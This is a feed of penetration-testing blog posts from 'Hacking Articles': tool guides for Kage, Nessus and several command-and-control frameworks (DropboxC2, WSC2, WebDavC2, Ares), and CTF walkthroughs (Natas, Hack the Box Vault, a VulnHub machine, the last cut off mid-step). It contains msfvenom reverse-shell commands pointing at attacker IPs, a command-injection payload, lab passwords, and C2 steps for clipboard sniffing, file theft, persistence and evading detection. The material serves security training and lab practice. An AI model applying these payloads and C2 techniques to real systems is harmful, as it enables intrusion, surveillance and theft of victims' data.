Hacking Articles

Kage is a GUI for Metasploit RCP servers. It is a good tool for beginners to understand the working of Metasploit as it generates payload and lets you interact with sessions. As this tool is on the process of developing, till now it only supports windows/meterpreter and android/meterpreter. For it to work, you should have Metasploit installed in your system. The only dependency it requires is npm.

Installations

Use the following git command to install the kage software :

git clone https://github.com/WayzDev/Kage.git

Go inside the kage folder and install nmp with the following command :

apt-get install npm

Further, use the following command :

npm install

And then run it with the following command :

npm run dev

Once all the perquisites are done, the kage will run. Click on the start server button as shown in the image below :

The server will start running. Once all the process is done, click on the close button as shown in the image below :

After click on the close button, it will automatically take all the details, and then you can click on the connect button to connect as shown in the image below :

Once you are connected, it will show you the following windows :

Under the heading payload generator, you can give all the details such as file name (kage.exe), payload (windows/meterpreter/reverse_tcp), lhost (192.168.1.9), lport (5252) and then click on generate.

After clicking on generate, it will create a new folder named kage (with small k), here, run python server so that you can share your malware with the victim. To run the python server, type :

python -m SimplpeHTTPServer 80

Once the file is shared and executed, it will show the following details under the jobs heading :

And when you go the sessions window through the dashboard, you will find a new session that has been created. Click on interact button to access the session.

After clicking on the interact button, the following window will open. Here, the first tab will show you all the information about the system.

The second tab will show you all the processes that are running on the victim’s PC.

And the third tab will give you all the information about its network. Here, you can use three commands through buttons provided and i.e. ifconfig, netstat, route, as shown in the image below :

Author: Shubham Sharma is a Cybersecurity enthusiast and Researcher in the field of WebApp Penetration testing. Contact here

The post Kage: Graphical User Interface for Metasploit appeared first on Hacking Articles.

In this article, we will learn about Nessus which is a network vulnerability scanner. There are various network vulnerability scanners but Nessus is one of the best because of its most successful GUI. Therefore, it is widely used in multiple organizations. The tools were developed by Renuad Deraison in the year 1998.

Table of Content

Introduction to Nessus
Linux Installation
Running Vulnerability Scans
Windows Installation

Introduction to Nessus

Nessus is an open-source network vulnerability scanner that utilizes the Common Vulnerabilities and Exposures engineering for simple cross-connecting between agreeable security instruments. Nessus utilizes the Nessus Attack Scripting Language (NASL), a basic language that portrays singular dangers and potential assaults. Nessus has a measured design comprising of incorporated servers that direct examining, and remote customers that take into account chairman communication. Executives can incorporate NASL portrayals of every presumed powerlessness to create altered outputs. Noteworthy abilities of Nessus include:

Compatible with all OS
Scans for vulnerabilities in the local and remote host
Informs about missing security in detail
Applies various attacks in order to pinpoint a vulnerability
It can schedule security audits
Runs security tests

Linux Installation

Let’s start the installation on Linux. Here we are installing Nessus on an Ubuntu 18 Machine. Firstly, we will invoke a root shell using sudo bash command. We are going to install Nessus using a deb file that can be downloaded from the Nessus Official Website. We traverse to the directory where we have downloaded the deb file. We will change permission to execute the file and then we will install the Nessus.deb file using the dpkg command.

chmod 777 Nessus-8.2.3-ubuntu910_amd64.deb
dpkg -I Nessus*.deb

Afterwards, as shown in the image using the following command to run Nessus :

/etc/init.d/nessusd start

This command will open our default browser, which in our case is Mozilla Firefox. And we will be greeted with a Warning about Certificate Installation. To use Nessus, we will have to get through this warning. The first click on Advanced followed by Accept the Risk and Continue.

Then it will ask you to create an account, as shown in the image, give the details for it.

Further, it will ask you for an activation code, provide that just as its shown in the image below :

Once all the formalities are done, Nessus will open and will allow you to perform any scan you desire as shown in the image below :

Running Vulnerability Scans

When you click on create new scans, there will be multiple scans that you can see in the following image :

And then in the policies tab, you can generate different policies on which the scans are based.

There are various policies templates too, as shown in the image below :

In order to start a new scan, go to scan templates and select a new scan and then give it a name and target IP as shown in the following image :

Once the scan is done, it will show you the result; this result will clearly indicate the risk that a vulnerability poses which goes from low to critical.

When you click on the vulnerability, for instance here we clicked on the first one which is a critical threat, it will give you details about vulnerability such as its severity, whether its RPC or not, its version, etc. as shown in the image below :

Now, we clicked on the different one which is a high-level threat, it will give you details about vulnerability such as its severity, whether its RPC or not, its version, etc. as shown in the image below :

Windows Installation

Download Nessus for windows from Nessus Official Website. And open it similarly in the browser to set it up.

Just like in Linux, we will be greeted with a Warning about Certificate Installation. To use Nessus, we will have to get through this warning. First click on Advanced followed by Accept the Risk and Continue.

Then it will ask you to create an account, as shown in the image, give the details for it.

Further, it will ask you for an activation code, provide that just as its shown in the image below :

And then you can start your scans in a similar way just as shown above in Linux.

Author: Shubham Sharma is a Cybersecurity enthusiast and Researcher in the field of WebApp Penetration testing. Contact here

The post Beginner’s Guide to Nessus appeared first on Hacking Articles.

Today, we will play a war-game called Natas. It has a collection of 34 levels. OverTheWire Organization hosts this war-game. Absolute Beginners are the target audience. It teaches the basics of serverside web-security in a fun and challenging way. To play this war-game, go to the Natas website by clicking here.

Objective

Find the password to login on to the next level.

Table of Content:

Introduction
Level 0
Level 0 → Level 1
Level 1 → Level 2
Level 2 → Level 3
Level 3 → Level 4
Level 4 → Level 5
Level 5 → Level 6
Level 6 → Level 7
Level 7 → Level 8
Level 8 → Level 9
Level 9 → Level 10

Introduction

Natas have levels designed in such a way that each level has a different website. To reach each website we will enter the URL in this format.

natasX.natas.labs.overthewire.org, where X is the Level Number.

To access a level, we will use the username for that level (e.g. natas0 for level 0) and its password. The password for the next level is hidden on the current level. We will have to enumerate the password for the next level that is hidden in the current level. All the passwords are stored at /etc/natas_webpass/.

Level 0

This is a pretty simple level. We have the login credentials given on the Natas Introduction Page. Just browse the URL and enter the login credentials.

Username: natas0

Password: natas0

Level 0 → Level 1

On successfully logging in the natas0 webpage, we will have a message in front of us. It says “You can find the password for the next level on this page” as shown in the figure given below.

Now as per convention, let’s try to find something inside the source code. To view source code, we will right click on the webpage and select ‘View Page Source’. And there we have the password commented in the source code.

Level 1 → Level 2

We use the credentials we extracted from the previous level to login into Level 1.

Username: natas1

Password: gtVrDuiDfck831PqWsLEZy5gyDz1clto

On successfully logging in the natas1 webpage, we will have a message in front of us. It says “You can find the password for the next level on this page, but rightclicking has been blocked!” as shown in the figure given below.

Now as right-clicking is disabled to view source code, we will have to find another way to retrieve the password form the source code. As we were using Mozilla Firefox and to open source code, we use ‘Ctrl + U’ shortcut. And there we have the password commented in the source code.

Level 2 → Level 3

We use the credentials we extracted from the previous level to login into Level 2.

Username: natas2

Password: ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi

On successfully logging in the natas2 webpage, we will have a message in front of us. It says “There is nothing on this page” as shown in the figure given below.

So, we check the Source Code of the page, here we find that we have an image file named pixel.png located in the files directory.

We opened the files directory as shown in the image given below. In this directory, we find the user.txt file.

On opening it we find the passwords for the various users present on the target machine. But we need the password for the natas3.

Level 3 → Level 4

We use the credentials we extracted from the previous level to login into Level 3.

Username: natas3

Password: sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14

On successfully logging in the natas3 webpage, we will have a message in front of us. It says “There is nothing on this page” as shown in the figure given below.

So, we check the Source Code of the page, here we find a commented hint. It says “Not even Google will find it this time”. Search Engine spiders always leave the links that are disallowed the robots.txt file. So, we thought to check if this website has one.

We opened the robots.txt as shown in the image given below. In this file, we find that the /s3cr3t/ directory is disallowed. So, let’s open and see for ourselves what’s inside the s3cr3t directory.

In this directory, we find the user.txt file.

On opening it we find the login credentials of the user natas4.

Level 4 → Level 5

We use the credentials we extracted from the previous level to login into Level 4.

Username: natas4

Password: Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

On successfully logging in the natas4 webpage, we will have a message in front of us. It says “Access disallowed. You are visiting from “” while authorized users should come only from “//natas5.natas.labs.overthewire.org/” ”as shown in the figure given below.

We capture the request in Burp Suite, here we see that there is a parameter named Referer. It says natas4.

We change that Referer parameter value to Natas5 as shown in the image given below.

After Forwarding the Request, we get the credentials of the user natas5.

Level 5 → Level 6

We use the credentials we extracted from the previous level to login into Level 5.

Username: natas5

Password: iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

On successfully logging in the natas5 webpage, we will have a message in front of us. It says “Access disallowed. You are not logged in” as shown in the figure given below.

We capture the request in Burp Suite, here we see that there is a parameter named loggedin. It is set to 0.

We change that loggedin parameter value to 1 as shown in the image given below.

After Forwarding the Request, we get the credentials of the user natas6.

Level 6 → Level 7

We use the credentials we extracted from the previous level to login into Level 6.

Username: natas6

Password: aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1

On successfully logging in the natas6 webpage, we will have a form in front of us. It says “Input secret:” as shown in the figure given below.

We went ahead and look for some clues for that secret that we will have to enter in order to get the credentials for the next level. Here we see that a file is included called ‘secret.inc’.

So, in order to grab the secret, we will browser the included file manually. So, as we can see in the given image, we can see that we add the /include/secret.inc in the URL. This gave us a blank page in response. So, we browsed the source code to find the secret commented on the webpage.

Now we copied the secret and went back to the form which was asking the secret. After entering the secret, we get the login credentials for the next level.

Level 7 → Level 8

We use the credentials we extracted from the previous level to login into Level 7.

Username: natas7

Password: 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9

On successfully logging in the natas7 webpage, we are given two links, Home and About as shown in the figure given below.

So, we check the Source Code of the page. Here, we can see the links “index.php?page=” in the given image. We have also hinted the location of the password, that is., /etc/natas_webpass/natas8.

As we can see in the given image, the link is shown in the address bar of our browser after clicking the Home link.

So, we modify the link to read the password stored in the natas_webpass.

//natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8

And we have the password for the next level. This is called command injection.

Level 8 → Level 9

We use the credentials we extracted from the previous level to login into Level 8.

Username: natas8

Password: DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

On successfully logging in the natas8 webpage, we will have a form in front of us. It says “Input secret:” as shown in the figure given below.

We opened the source code and found that the secret is encoded. Also, we have a function which encodes the secret.

Hence to decode the secrete we just create a function that can decode the secret. This can be done as shown in the given image.

php -a
echo base64_decode(strrev(hex2bin('3d3d516343746d4d6d6c315669563362')));

As we now have the decoded secret, we can use it extract the credentials from the webpage of natas8 as shown in the given image.

Level 9 → Level 10

We use the credentials we extracted from the previous level to login into Level 9.

Username: natas9

Password: W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl

On successfully logging in the natas9 webpage, we will have a form in front of us. It says “Find words containing” as shown in the figure given below.

We opened the source code and found that when we enter a keyword, it is passed via a function called passthru(). It takes the value in $key and executes it directly.

So, we will use (;) to execute multiple commands. We will try to read the password at the next level.

;cat /etc/natas_webpass/natas10

As we can see that the password is printed on the screen as shown in the given image.

Level 10 → Level 11

We use the credentials we extracted from the previous level to login into Level 10.

Username: natas10

Password: nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

On successfully logging in the natas10 webpage, we will have a form in front of us. It says “For security reasons, we now filter on certain characters Find words containing” as shown in the figure given below.

We opened the source code and found that when we enter a keyword, it is passed via a function called passthru(). It takes the value in $key and it filters the input of the characters (/;|&) as shown in the given image.

So, we will use (.*) to execute multiple commands. We will try to read the password at the next level.

.*/etc/natas_webpass/natas10

As we can see that the password is printed on the screen as shown in the given image.

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

The post OverTheWire – Natas Walkthrough (0-11) appeared first on Hacking Articles.

In this article, we will learn how to use DropboxC2 tool. It is also known as DBC2.

Table of Content:

Introduction
Installation
Getting Dropbox API
Exploiting Target
Sniffing Clipboard
Capturing Screenshot
Command Execution
File Download

Introduction

DBC2 is primarily a tool for post-exploitation. It has an agent running on the target’s machine, a controller, running on any machine, PowerShell modules, and Dropbox servers as a means of communication. It is inspired by the PowerShell Empire Framework. This tool is developed using python. The credit for developing this tool goes to Arno0x0x.

For this particular demonstration,

Attacker: Kali Linux

Target: Windows 10

Installation

To begin, first, we need the tool on our Attacker Machine. To do this, we will clone the tool directly from the GitHub.

git clone https://github.com/Arno0x/DBC2

After running the above command, we would have a directory created by the name of DBC2. Now, we will traverse inside that directory using the cd command. After that, we are going to need to install the dependencies of the tool. There are multiple ways to do this, but here we are using pip command along with a requirements.txt file that we cloned from git earlier.

cd DBC2/
pip install -r requirements.txt

Getting Dropbox API

Now, this tool uses the Dropbox Servers as the medium to run agents on the target machine. In order to do that, this tool requires a Dropbox API. To get that, first, create an account on Dropbox. Then after creating the account, head to developer tools here. A webpage will open similar to the one shown below. Here we will select the “Dropbox API”. Then in the type of access section, we will choose “App folder”. Name the app as per choice. Then click on Create App Button to proceed.

This will lead to another webpage as shown below. Here, move on to the O Auth 2 Section, and

Generate access token. This will give the Dropbox API required for this particular practical.

Copy the Generated access token, now get to the directory we cloned earlier. Here we have a file named config.py. We will open it using nano command and paste the Access token as the value for “defaultAccessToken” as shown in the given screenshot given below.

Exploiting Target

Now, it’s time to run the tool, check for appropriate permission before running the tool. As we run the tool, we are greeted with a cool looking banner as shown in the given below. Followed by some details about the Author and Version and tool. After this, it will ask for a master password which will be used to encrypt all the data between the agents and the controller. Enter the password of choice. It will encrypt the password entered and display the result. We can copy the code shown and add to the config.py file so that it doesn’t ask again for a master password. After this, it will create an incoming directory inside the Directory we cloned earlier. This will be used as a buffer to save files from the target.

python dropboxC2.py

This tool requires to upload the modules and stager on Dropbox before proceeding further. We will do this using the command given below.

publishStage dbc2_agent.exe

This will upload a file on the Dropbox as shown in the image given below. This file is encrypted using XOR encryption.

Now let’s check if the stage is published using the command given below:

listPublishedStage

Now that stage is uploaded, let’s use it to create a stager. We are going to create a batch file. But we can use many other types of stager options. This tool provides stager in macro, oneliner, JavaScript, MS build sct and much more. This command will create a stager.bat in the tmp directory. We sent this bat file to our target machine.

genStager batch default

After the batch file is executed on the target machine, we will be informed with a message on the terminal that Agent found with ID. Now we will use the list command to see the list of the agents. And then we will copy the AgentID and then use it to interact with the session as shown in the given image.

list
use [AgentID]

This will create a file on the Dropbox with the .status extension as shown in the given image.

Clipboard Sniffing

We can get the clipboard data that the target has on its clipboard. That is., the data he/she has copied. To do this we will have to start a sniffer using the command clipboardLogger start. Then wait till the target copies some data. Then Stop the sniffer using the command clipboardLogger stop. After stopping the sniffer the clipboard will be saved in a text file inside the incoming directory.

clipboardLogger start
clipboardLogger stop

Let’s take a look at what target copied on his/her machine. We are going to use the cat command on a new Kali terminal to read the file as shown in the given image.

cat /root/DBC2/incoming/clipboardlogger.txt

Capturing Screenshot

Now furthermore we can grab a screenshot of then target machine. To do this we will use the screenshot command as shown in the given image.

screenshot

The screenshot will be captured and stored in the incoming directory. We can see that the target is browsing a website on his/her machine in the given image.

Command Execution

We can run some PowerShell commands on the target machine using the parameter cmd. This tool doesn’t offer the shell but it can execute one command at a time. So, we type cmd and then it asks the command that is to be executed. Here we run the command dir. And we have the list of files as shown in the given image.

cmd
dir

File Download

Furthermore, we can download files from the target. To do this we will have to use the command getFile followed by the file name or path. This will download the file form the target to our attacker machine.

getFile sharetext.txt

The tool will download the file inside the incoming directory we discussed earlier. We can view the file using cat command as shown in the image given below.

cat /root/DBC2/incoming/sharetext.txt

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

The post Command and Control with DropboxC2 appeared first on Hacking Articles.

Today we are going to solve another CTF challenge “Vault”. It is a retired vulnerable lab presented by Hack the Box for helping pentesters to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Intermediate

Task: To find user.txt and root.txt file

Note: Since these labs are online available, therefore, they have a static IP. The IP of Curling is 10.10.10.109

Penetrating Methodology

Network scanning (Nmap)
Surfing the IP address on the browser
Surfing directories on the browser
Using dirb for directory scanning
Creating Payload using msfvenom
Getting Meterpreter Session
Enumerating through directories
Getting SSH login credentials
Logging into SSH
Pinging Host IP
Scanning Ports on Host IP
Dynamic Port forwarding with SSH
Updating the VPN Configuration file
Executing Netcat listener
Finding user.txt
Getting SSh Login Credentials
Using the proxy command option
Escaping restricted shell
Using gpg to decrypt root.txt.gpg file
Converting the file in the base64 string using python3m
Using echo to decrypt the string
Reading our Root Flag

Walkthrough

Let’s start off with our basic Nmap command to find out the open ports and services.

nmap -p- -sV -sC 10.10.10.109

As port 80 is running HTTP service, we open the IP address in the web browser.

We thought of opening sparklays in the browser along with the Machines IP. But it turned out to be forbidden.

We don’t find anything on the web page, so we further enumerate the web service using dirb scan.

dirb //10.10.10.109/sparklays/ -w

From dirb scan, we found a useful directory /design/design.html which we opened in the browser. Since the only thing left to do on this Page is to click on Change Logo.

It redirected us on a File Upload Page.

Now we have used msfvenom to generate malicious PHP file.

msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.13.234 lport=1234 -f raw > shell.php5

We have successfully uploaded the malicious file.

On the other hand, we have setup listening using Metasploit-framework.

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost tun0
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > run

Let’s open our malicious file using the browser.

Finally, we have got the meterpreter.

sysinfo

While looking for our first flag, we have some useful credential for ssh login.

Username- dave

Password- Dav3therav3123

cd Desktop
ls -al
cat Servers
cat key
cat ssh

Time to login into ssh.

Username- dave

Password- Dav3therav3123

We use the ping command to find all the available machines on the subnet “192.168.122.1/255”.

for i in {1..255}; do ping -c 1 192.168.122.$i | grep 'from' ; done

Let’s use the following command to scan the ports of 192.168.122.4 to see what we are up against.

Now connect to the client machine using the command below.

ssh -D 8080 dave@10.10.10.109

Password- Dav3therav3123

The proxy on the browser is set up to point to socks5://127.0.0.1:8080.

Let’s open the IP 192.168.122.4 in the browser. And see where it directed us. Click on VPN Configuration link.

It directed us to the page where we need to update the VPN file. We have found the details in Test VPN link.

Simply we have pasted and modified the details in which we have given the IP address of the Target Machine along with port 1234. Click on update file.

On the other hand, we have executed listening on port 1234.

nc -lvp 1234

We have easily got the root access. Enumerating directories to find user.txt.

cd /root
ls
ls -al

After some digging, we have found our first flag.

ls
cd dave
ls
cat user.txt

Now we thought of reading the logs, we were totally out of hints. While looking at the logs we found something interesting. We saw that the firewall is accepting inbound traffic from port 4444/tcp to host 192.168.5.2 which is listening at 987/tcp.

So, to find out, what’s running on 987/tcp. Use the following command.

ncat -p 4444 192.168.5.2 987

It came out be SSH service.

We again found Credentials for SSH Login.

Username- dave

Password- dav3gerous567

cat ssh

What are we waiting for, time to log into SSH, here we again found User.txt.

ssh dave@192.168.122.4

Password- dav3gerous567

ls
cat user.txt

Since dave has a restricted default shell, so we are using proxy command to re-login.

ssh -o 'Proxycommand ncat -p 4444 %h %p' -p 987 dave@192.168.5.2

After logging in as user “monitor” we find that we have a restricted shell. We are not able to change the SHELL variable. After spawning a TTY shell, we are able to change the SHELL environment variables.

echo $SHELL
export SHELL=/bin/bash:$SHELL
python
bash
export SHELL=/bin/bash:$SHELL

We tried decrypting the file root.txt.png but couldn’t succeed. Since it requires a secret key.

gpg -d root.txt.gpg

There are not many options left, let’s convert into a base64 encoded string using python3m.

python3m -c "import base64;print(base64.b64encode(open('root.txt.gpg', 'rb').read()))"

We have copy & pasted the encoded string to the ubuntu machine and decrypted it. Since we have found the paraphrase ‘itscominghome’ we can easily open the file root.txt.gpg to read our final flag.

Finally, we have read our Final Flag.

gpg -d root.txt.gpg

Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing Years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here

The post Hack the Box Vault: Walkthrough appeared first on Hacking Articles.

In this article, we will learn how to use WebSocket C2 tool. It is also known as WSC2.

Table of Content:

Introduction
Installation
Exploiting Target
Command Execution
File Download

Introduction

WSC2 is primarily a tool for post-exploitation. WSC2 uses the WebSocket and a browser process. This serves as a C2 communication channel between an agent, running on the target system, and a controller acting as the actual C2 server. This tool is developed using python. The credit for developing this tool goes to Arno0x0x.

For this particular demonstration,

Attacker: Kali Linux

Target: Windows 10

Installation

To begin, first we need the tool on our Attacker Machine. To do this, we will clone the tool directly from the GitHub.

git clone //github.com/Arno0x/WSC2.git

After running the above command, we would have a directory created by the name of WSC2. Now, we will traverse inside that directory using the cd command. Let’s see the contents of the directory that we just cloned using the ls command.

cd WSC2/
ls

After that we are going to need to install the dependencies of the tool. There are multiple ways to do this, but here we are using pip command along with a requirements.txt file that we cloned from git earlier.

pip install -r requirements.txt

As we saw earlier that we have a config.py file inside the cloned directory. We have to make some changes inside this config.py file so as to get the session on our system. We used nano to edit the file. As shown in the figure, when we opened the config.py file using nano, we found a variable CALLBACK. It has an IP Address. We changed it to the IP Address of our Attacker Machine i.e Kali Linux.

nano config.py

Exploiting Target

./wsc2.py

We are going to create a batch file. But we can use many other types of stager options. This tool provides stager in jscript1, jscript2, jscript3. We are using jscript1 here because it is not required to compile. Rest of the stagers are required to compile. This command will create a wsc2Agent1.js in stagers directory.

genStager jscript1

Now let’s get the file to the target machine. To do this we will open up a new terminal and traverse into the stagers directory using the cd command. Here, we are using the python server to share the file to the target. This can be done using any other method of choice.

cd stagers/
ls
python -m SimpleHTTPServer 80

After the jscript file is executed on the target machine, we will be informed with a message on the terminal that New agent connected. Now we will use the list command to see the list of the agents.

list

And then we will copy the AgentID and then use it to interact with the session as shown in the given image.

use [AgentID]

Command Execution

We can run some PowerShell commands on the target machine using the command cli. Here we run the command systeminfo. And we have the system information of the target as shown in the given image.

cli
systeminfo

File Download

help getFile
getFile sample_text.txt

The tool will download the file inside the incoming directory we discussed earlier. We can view the file using cat command as shown in the image given below.

cd incoming/
ls
cat sample_file.txt

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

The post Command & Control: WebSocket C2 appeared first on Hacking Articles.

In this article, we will learn how to use WebDav C2 tool.

Table of Content:

Introduction
Installation
Exploiting Target
Command Execution

Introduction

WebDavC2 uses the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent, running on the target system, and a controller acting as the actual C2 server. This tool is developed using python. The credit for developing this tool goes to Arno0x0x.

WebDavC2 is composed of a controller, which acts as the C2 server. It also comprises of an agent, written in C#/.Net, running on the target system. It is delivered to the target system via various initial stagers. It also consists of various types of initial stagers (created on the fly when the controller starts) used for the initial compromisation of the target system.

For this particular demonstration,

Attacker: Kali Linux

Target: Windows 10

Installation

To begin, first we need the tool on our Attacker Machine. To do this, we will clone the tool directly from the GitHub.

git clone https://github.com/Arno0x/WebDavC2

cd WebDavC2/
ls
chmod +x webdavC2.py

Exploiting Target

As we run the tool, we are greeted with a cool looking banner as shown in the given below. Followed by some details about the Author and Version and tool. After this it will create multiple stagers in Batch, Macro and Jscript as shown in the figure below. It also starts an WebDav Server at the IP provided at port 80.

python webdavC2.py

Now we have to send the files to the target. For this we will open a new terminal and traverse inside the stagers directory. Here as we can see that we have multiple stagers. Let’s try to open the batch file, here we see that the PowerShell batch file in encrypted. Now we will sent these stagers to the target using the python server.

cd stagers/
ls
cat stager.bat
python -m SimpleHTTPServer 80

Command Execution

After the stager is executed, we are provided with a prompt to run commands. Here we run the command systeminfo. And we have the system information of the target as shown in the given image.

systeminfo

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

The post Command & Control: WebDav C2 appeared first on Hacking Articles.

In this article, we will learn how to use Ares tool. This tool performs the Command and Control over the Web Interface. This tool can be found on GitHub.

Table of Content:

Introduction
Installation
Exploiting Target
Command Execution
Capturing Screenshot
File Download
Compressing Files
Persistence Agent
Clean Up

Introduction

Ares is a Python Remote Access Tool. Ares is made of two main programs: A Command & Control server, which is a Web interface to administer the agents and an agent program, which runs on the compromised host, and ensures communication with the CNC. The credit for creating this tool goes to Kevin Locati.

For this particular demonstration,

Attacker: Kali Linux

Target: Windows 10

Installation

To begin first, we need the tool on our Attacker Machine. To do this, we will clone the tool directly from the GitHub. After Cloning, we traversed into the newly created directory called Ares through the cd command as shown in the image.

git clone https://github.com/sweetsoftware/Ares.git
cd Ares
ls

Now, to make the tool work we will be needing to install some prerequisites. Let’s start from the file that we cloned earlier name requirements.txt. This file contains the details of the python libraries that are required to be installed.

pip install -r requirements.txt

Now as we have our target a Windows Machine, we will need to compile the agent that is compatible with the Windows Machine. To do that we will be needing wine. So, using the file that we cloned earlier, let’s begin the wine installation. Now this will take a bit of time.

ls
./wine_setup.sh

Exploiting Target

Now that we have successfully installed all the requirements needed to run the Ares tool. Its time to gain the Command and Control Session. To do this we are going to need an agent. For this, we use the cd command to traverse into the agent directory. After that, we list the contents of the file to find a config file. We will be needing to edit the file so as to gain the session.

cd agent/
ls
nano config.py

As we can see, when we open the config file using the nano command. We see that the SERVER variable has an IP Address. We are going to edit it and change it to the internal IP address of the attacker machine, which in my case is 192.168.1.4. We don’t require any further changes. So Save and Exit the nano editor.

Now that we have configured the config file, Its time to create an agent. As we have a Windows Machine as a target. We will be creating a windows agent using the command given below.

./builder.py -p Windows –server http://192.168.1.4:8080 -o agent.exe

Now, we will send this agent to the target machine by any means of preference. After that, we will be needing to launch the server. This is required as the agent will communicate to this server. Let’s get back to the Ares directory. Here we have a sub-directory called server. After traversing in it we will have to initiate the database for that we will be using the initdb parameter. Initiating the database is to be done only the first time. Now we will run the server as shown in the given image.

ls
cd server/
./ares.py initdb
./ares.py runserver -h 0.0.0.0 -p 8080 --threaded

Now we will open the server IP in our browser. Here we will see a form asking for the password as shown in the given image. We entered the password and clicked on Define to continue.

Now that the password is defined, we will have to enter the password to log in.

Here we have the main index of the Ares GUI. It has the following links: Change Password, Disconnect, Agent List. Now, we will go back to the step where we created an agent. Only after we execute the agent on the target machine, we will get a line Agent in Agent List.

As we can see the image given below, that we have an agent alive. We have the name of the agent, status, user that was logged in when the agent went live, we have the hostname too. We are also informed about the IP Address and Operating System of the target. Here we could run the agent on multiple devices each one of them will be visible here. We can select sessions from here and execute the same command on multiple session at the same time. We will have to click on the name to proceed.

Command Execution

As Ares runs the Power Shell commands, let’s start with the System Information command. As we can see that we have all the system config information of the target machine.

systeminfo

Capturing Screenshot

Now, Let’s take a screenshot of the target machine. To do this we will type in the screenshot command and the agent will capture the screenshot and provide a link as shown in the figure. On opening this link the screenshot can be viewed.

screenshot

File Download

We can also download files from the remote target using this agent. To do this we require the name of the file. This can be obtained using the dir command. Now once we have the filename, we will download it to our local attacker machine as shown in the image given below.

download file.txt

Compressing Files

We can compress a directory on the remote target using the Ares agent. For this, we require the name of the directory. After we extract the name of the directory, we can compress the file remotely using the command given below. Here, we have ‘sample’ the name of the directory and ‘compressed.zip’ the name of the compressed file.

zip compressed.zip sample

Persistence Agent

We could invoke the persistence in the agent using the command persist. This command installs the agent on the remote target.

persist

Clean Up

This tool also performs the clean up after the work through the session Is done. This command removes the agent from the target machine. Hence it goes on undetectable.

clean

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

The post Command & Control: Ares appeared first on Hacking Articles.

Hello friends! Today we are going to take another CTF challenge known as “SP eric”. The credit for making this VM machine goes to “Daniel Solstad”. Our goal is to get 2 flags to complete the challenge.

They are located at:

/root/flag.txt

/home/eric/flag.txt

You can download this VM here.

Security Level: Beginner

Penetrating Methodology:

Network scanning (Nmap)
Surfing HTTP service port
Enumerating directories using Dirb
Dumping git files using gitdumper
Extracting git file using Extractor
Enumerating for Login Credentials
Uploading PHP reverse shell
Getting user flag
Editing the file with a php shell
Getting the root flag

Walkthrough

We will start the cracking of this CTF with a port scan using nmap. Through the nmap scan, we get that we have the port 80 open. Also as we can see in the given image that we have also discovered the .git directory.

nmap -A 192.168.1.18

By convention, if we have the port 80, we try and open the IP Address in the Web Browser. In doing so we see a message of “Blog under construction”. This seems like a Dead End. Let’s try another approach.

We ran a directory bruteforce using the dirb tool. This revealed the admin.php, index.php and a directory named “upload”. We will try to discover all these to enumerate as much as we can.

dirb //192.168.1.18

On opening the admin.php, we get a form with the Username and Password fields. Seeing a form, our basic instinct was the SQL Injections. We spent a little time on that, then we took the advice of author that there is no use of Bruteforcing. We will have to figure our some another way.

Now, back on the nmap scan, we did in the beginning. We found a Git repository. On browsing a few sites on Google, we found this epic tool called GitTools. We cloned this tool on our Desktop as shown in the given image. After that, we traversed in the GitTools Directory to using the cd command. Here, we found 3 tools: Dumper, Extractor, Finder. We will use this tool to enumerate this git.

git clone //github.com/internetwache/GitTools.git
cd GitTools/
ls

First, we traversed into the Dumper directory to use the gitdumper tool. This tool will dump all the files on the git. We will have to give a destination directory to use it. This tool can be used as shown in the given image.

./gitdumper.sh //192.168.1.18/.git/ dest-dir

Now that we have successfully dumped the git files using the gitdumper tool. It’s time to use the Extractor tool. For this, we will have to traverse inside the Extractor directory within the GitTools. Now to use the extractor we will have to give the path of the destination directory in with we dumped the git files using the gitdumper.

./extractor.sh ../Dumper/dest-dir ./dest-dir

The Extractor tool will create the directories based on the commits on the git that we dumped earlier which can be observed in the given image. Three directories were created in response to three commits on the git. We traversed in the directory named “0-3db5628b550f5c9c9f6f663cd158374035a6eaa0/” to find three file: admin.php, commit-meta.txt and index.php. We read the admin.php file using the cat command to find the username and password for the form we found earlier. We made a note of these credentials.

ls
cd 0-3db5628b550f5c9c9f6f663cd158374035a6eaa0/
ls
cat admin.php

We went back to the admin form we discovered earlier and entered the login credentials we found in the git. This was a successful login. Upon logging in we found more forms, titled: Add new post and Add site to blogroll. Here, we found an Upload option.

So, we entered the necessary information in the various field on the page and selected a php reverse shell in the location of uploading the file. After all the entries filled, we clicked on the add button to upload the file with this entry.

Even though the file was successfully uploaded, to get the session, we will have to execute the file on the target machine. Back to the nmap scan, we found a directory called “upload”. It’s time to get to that directory. We used the name of the php file we uploaded to execute the file on the target system as shown in the given image.

On the other side, in a new terminal, we created a netcat listener at the port that we mentioned the php reverse shell script. Upon Execution, we got the shell of the target system. To get a proper shell, we used the python one-liner. After getting the proper shell, we used the ls command to enumerate for the flag. We traversed in the eric directory. Here we found the 1^st flag as shown in the given image. We also found a file named backup.sh. As we can see in the given image that the backup.sh file has all the permission required and it runs as root.

nc -lvp 1234
python3 -c 'import pty;pty.spawn("/bin/bash")'
cd /home
ls -al
cd eric
ls -al
cat flag.txt

So, we have to target the backup.sh file to get the root shell on the target machine. We created a msfvenom script to exploit the target machine. We used the reverse_bash payload to create this script.

msfvenom -p cmd/unix/reverse_bash lhost=192.168.1.4 lport=4455 R

